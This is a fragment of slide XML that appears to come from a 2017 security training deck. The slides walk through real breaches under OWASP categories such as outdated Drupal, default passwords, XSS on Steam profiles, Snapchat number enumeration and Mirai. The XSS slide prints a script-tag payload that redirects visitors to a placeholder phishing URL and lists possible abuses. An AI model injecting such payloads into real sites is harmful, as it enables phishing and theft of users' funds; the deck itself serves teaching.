          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="457200"/>
            <a:ext cx="1416049" cy="538981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Shape 319"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="822960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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Not for public distribution • Copyright 201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C14C31FF-7DA4-4801-BAF5-7262F8A10493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4454820" y="2417862"/>
            <a:ext cx="234360" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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363" name="Shape 363"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3315050" y="1397400"/>
            <a:ext cx="5592300" cy="2348700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>“Mossack Fonseca’s client portal runs on the open source Drupal CMS, but that the version used by the firm contained a staggering 25 vulnerabilities as it hadn’t been updated since August 2013”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>wired.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>One of these was a SQL injection vulnerability which allowed execution of arbitrary code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="245825" y="530837"/>
            <a:ext cx="2721200" cy="408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Shape 370"/>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371" name="Shape 371" title="510660804.mp4">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2223600" y="1129927"/>
            <a:ext cx="4696800" cy="3522600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Shape 372"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="965100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bonus: Using Components with Known Vulnerabilities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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522600" y="776200"/>
            <a:ext cx="8098800" cy="34881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ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Broken Authentication and Session Management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>US Department of Revenu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="2500" dirty="0">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Shape 383"/>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384" name="Shape 384"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="927450" y="538950"/>
            <a:ext cx="7289100" cy="4065600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFAFA"/>
                </a:highlight>
              </a:rPr>
              <a:t>Department of Revenue's computers exposing 3.6 million Social Security numbers and 387,000 credit and debit card numbers, one of the largest computer breaches in the state or nation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FAFAFA"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="333333"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFAFA"/>
                </a:highlight>
              </a:rPr>
              <a:t>USA Today (Oct 26 2012)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FAFAFA"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFAFA"/>
                </a:highlight>
              </a:rPr>
              <a:t>This was achieved, partly due to a default password set on the authentication layer. This hack was particularly damaging due to the lack of encryption of some sensitive data.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Shape 390"/>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391" name="Shape 391"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="927450" y="349050"/>
            <a:ext cx="7289100" cy="1699200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFAFA"/>
                </a:highlight>
              </a:rPr>
              <a:t>In an unrelated incident, IRS got hacked again in 2015, exposing people’s social security numbers, address, incomes. This information was then further used to authenticate themselves to get transcripts of their victims, resulting in more exposed data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FAFAFA"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>The 2017 Identity Fraud Study... found that $16 billion was stolen from 15.4 million U.S. consumers in 2016... In the past six years identity thieves have stolen over $107 billion. (www.iii.org)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="392" name="Shape 392"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1412125" y="2367675"/>
            <a:ext cx="6319750" cy="208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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522600" y="776200"/>
            <a:ext cx="8098800" cy="34881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ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Cross-site Scripting (XSS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Steam Profile Pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Malgun Gothic"/>
              <a:ea typeface="Malgun Gothic"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgu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Shape 403"/>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404" name="Shape 404"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="466300" y="553750"/>
            <a:ext cx="3291225" cy="4035999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Shape 405"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4288576" y="1071750"/>
            <a:ext cx="4564200" cy="3000000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1200" dirty="0"/>
              <a:t>This was a generic XSS flaw on the profile page that went undiscovered.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="1200" dirty="0"/>
              <a:t>How is this bad? Take for example, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="1200" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="1200" dirty="0" err="1"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="1200" dirty="0"/>
              <a:t> = "[PHISHING_SITE_URL]";&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1200" dirty="0"/>
              <a:t>Potential things a malicious user could have done includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1200" dirty="0"/>
              <a:t>Redirecting a user to a website to phish their login.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1200" dirty="0"/>
              <a:t>Utilizing CSS trickery to change your profile to trick users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1200" dirty="0"/>
              <a:t>Loading larger payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1200" dirty="0"/>
              <a:t>Silently draining your Steam Wallet funds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1200" dirty="0"/>
              <a:t>Spreading Malware via an auto-download.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1200" dirty="0"/>
              <a:t>Fortunately, this was fixed pretty quickly by steam.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1200" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="1050" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Reddit user "R3TR1X", Moderator "DirtDiglett"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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522600" y="776200"/>
            <a:ext cx="8098800" cy="3488100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Insecure Direct Object References</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>SnapchatDB leak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Shape 416"/>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417" name="Shape 417"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="427500" y="3086800"/>
            <a:ext cx="8289000" cy="1872000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="1200"/>
              <a:t>4.5 million Snapchat phone numbers leaked with username. This was due to the ability to enumerate a predictable resource. A user could simply call every possible combination of phone numbers, and from the server response, judge if it was valid.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="418" name="Shape 418"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2580825" y="490975"/>
            <a:ext cx="3982356" cy="2806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ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Security Misconfiguration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Various</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="2500" dirty="0" err="1">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>CloudPets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>Mirai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2500" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>未来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2500" dirty="0">
                <a:latin typeface="medium-content-serif-font"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="2500" dirty="0">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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143499"/>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en-US" sz="6000" b="1" i="0" u="none" strike="noStrike" cap="none">
